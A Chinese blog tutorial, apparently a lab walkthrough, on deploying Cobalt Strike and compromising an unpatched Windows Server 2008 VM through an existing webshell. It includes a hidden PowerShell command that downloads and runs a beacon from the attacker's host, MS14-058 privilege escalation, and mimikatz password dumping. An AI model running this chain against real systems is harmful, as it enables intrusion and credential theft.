windwos搭建cs并利用

简介: 渗透同一局域网时,如何快速搭建 cobaltstrike 并利用

渗透同一局域网时,如何快速搭建 cobaltstrike 并利用

并非实战,只是讲解一下操作思路。

实验环境:攻击机:win10 ip:192.168.88.207

靶机:2008   ip:192.168.88.250(无杀软,新系统,未打补丁)

并且已经取得 2008 的 webshell


准备材料:Win10 物理机vm

虚拟机(安装 windows server 2008)

Jdk1.8

cobaltstrike 3.14(我一般简称 cs)


下载jdk,理论上任意版本都可以,看自己喜好。

我提供一个 1.8 的下载地址:http://www.onlinedown.net/soft/61003.htm

cs 自行下载

安装好 jdk 之后 java 目录里面有两个文件夹,一个 jdk,一个 jre。

当你以为安装好了,运行一下结果报错了。。。

命令:teamserver 192.168.88.207 orange

解释:就是运行 cobaltstrike 3.14 目录里面的 teamserver.bat 文件 加上自己的 ip 地址 后面orange 是连接密码,这条命令就是启动 teamserver 服务。

这条命令,就是启动这个 teamserver.bat.

这里有个坑 运行就报错,我们需要把 C:\Program Files (x86)\Java\jdk1.8.0_73\jre\bin 里面的server 文件夹,复制一份 到 C:\Program Files (x86)\Java\jre1.8.0_73\bin 里面

然后在运行

这里就是运行成功了。(最小化这个 cmd 框框就行,让他保持在后台运行)

默认端口 50050

可以在 teamserver.bat 里面修改。

我们再打开 cobaltstrike.bat,这个 bat 文件就是客户端。

运行成功后,会打开一个 cmd,和一个 java 的 gui 界面。(最小化 cmd 界面就行,关闭的话Java 的 gui 会同时退出。)

主机我们刚才启动服务器的 IP,192.168.88.207

默认端口 50050

用户名 任意

密码 orange (就是我们刚刚启动服务端 后面自己填的密码)

连接成功后就是这个界面

接下来 我们创建监听端口,就是反弹 shell 监听的端口。

最后点击保存。

创建好之后我们再来创建一条 cmd 命令用来反弹 shell。

由于目标机是 2008 系统,支持 powershell,我们可以创建个 powershell 命令。

点上面那个看起来很可爱的 cmd 小图标,我们配置一下 木马的下载端口

然后点击开始

我们复制里面的内容。命令解释:就是通过 powershell 命令,下载并运行我们的木马。

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.88.207:8881/a'))"

复制到菜刀里面运行。执行完毕之后,我们可以看到 cs 里面上线了一台主机。

可以看到,当前权限比较低。

查看系统,没有打补丁

可以尝试利用 cs 的自带的 ms14-058 模块提权,选中这个会话,右键选中提权。

Ms14-058 就可以了,点击开始后,稍等几十秒。

我们可以看到,一个 system 权限的会话反弹回来了。

由于 shell 默认是 60 秒返回一次数据,太久,我们可以设置 sleep 为 5 秒。这样设置之后执行命令就快了,方便操作。不然的话 每次执行命令都要间隔 60 秒,这谁能忍?

选中需要设置的会话,右击进入 beacon。输入 sleep 5 就差不多了。

然后,我们 run 咪咪卡兔子就可以得到以明文显示的管理员账号密码了。。

这里补充一个知识点:

读取密码明文密码的原理大概就是:

Windows 系统,在用户登录之后,用户的账号密码会以某种加密形式保留在 lsass.exe 这个进程的内存中,而这个加密算法是可逆的 能被解密出明文。mimikatz 就是读取进程内存获取密码的。

这个进程是 system 系统权限运行的,所以我们如果想要读取 lsass.exe 的内存,就需要以管理员权限或者 system 权限来运行 mimikatz 才能读取到密码。

这 cs 跟远控原理差不多,但远远比远控的功能强大!远控有的功能 cs 都有。例如:端口转发,socks 代理,截屏,文件管理,键盘记录,执行命令,。

远控没有功能的 cs 也有,例如:提权,扫描目标内网, 又或者像 burp 那样,可以自己添加插件,牛批的话可以自己写插件,扩展性极强。行了吹不下去了。

上面的也简单,基础用法。

相关文章
|
安全 Linux Shell
【内网安全-CS】Cobalt Strike启动运行&上线方法&插件
【内网安全-CS】Cobalt Strike启动运行&上线方法&插件
3281 0
【内网安全-CS】Cobalt Strike启动运行&上线方法&插件
|
算法 安全 Java
CobaltStrike windows7 无法上线
CobaltStrike windows7 无法上线
560 0
|
SQL Web App开发 XML
广联达OA漏洞合集(信息泄露+SQL注入+文件上传)
广联达Linkworks办公OA存在信息泄露,攻击者可通过此漏洞获取账号密码登录后台,造成其他影响。
2850 1
|
1月前
|
存储 安全 前端开发
浅谈前端安全领域的XSS攻击
本文由喵喵侠撰写,介绍前端安全中的XSS(跨站脚本攻击)基本概念与防范。涵盖反射型、存储型和DOM型XSS原理,并通过一个留言板案例演示攻击过程。文章还提供防御建议,如避免使用innerHTML、采用DOMPurify过滤恶意脚本,帮助开发者提升安全意识,防范常见前端漏洞。
138 0
|
人工智能 安全 数据库
AiCodeAudit-基于Ai大模型的自动代码审计工具
本文介绍了基于OpenAI大模型的自动化代码安全审计工具AiCodeAudit,通过图结构构建项目依赖关系,提高代码审计准确性。文章涵盖概要、整体架构流程、技术名词解释及效果演示,详细说明了工具的工作原理和使用方法。未来,AI大模型有望成为代码审计的重要工具,助力软件安全。项目地址:[GitHub](https://github.com/xy200303/AiCodeAudit)。
4670 9
|
网络协议 Shell Linux
使用NPS内网穿透图文详细教程
使用NPS内网穿透图文详细教程
4523 2
|
Java 数据安全/隐私保护
[笔记]攻防工具分享之 CobaltStrike框架 《一》环境配置
[笔记]攻防工具分享之 CobaltStrike框架 《一》环境配置
361 0
|
编译器 C# Windows
C#基础:手动编译一个.cs源代码文件并生成.exe可执行文件
通过上述步骤,应该能够高效准确地编译C#源代码并生成相应的可执行文件。此外,这一过程强调了对命令行编译器的理解,这在调试和自动化编译流程中是非常重要的。
1473 2
|
安全 JavaScript API
文件上传漏洞——绕过
绕过客户端检测(JS检测) 绕过服务端检测(MIME类型检测、文件后缀检测、文件内容检测)
440 1
|
Web App开发 XML 安全
DedeCMS存在文件包含漏洞导致后台getshell(CVE-2023-2928)
DedeCMS存在文件包含漏洞导致后台getshell,攻击者可通过该漏洞获取目标服务器控制权限,进行深度利用。
1326 1

热门文章

最新文章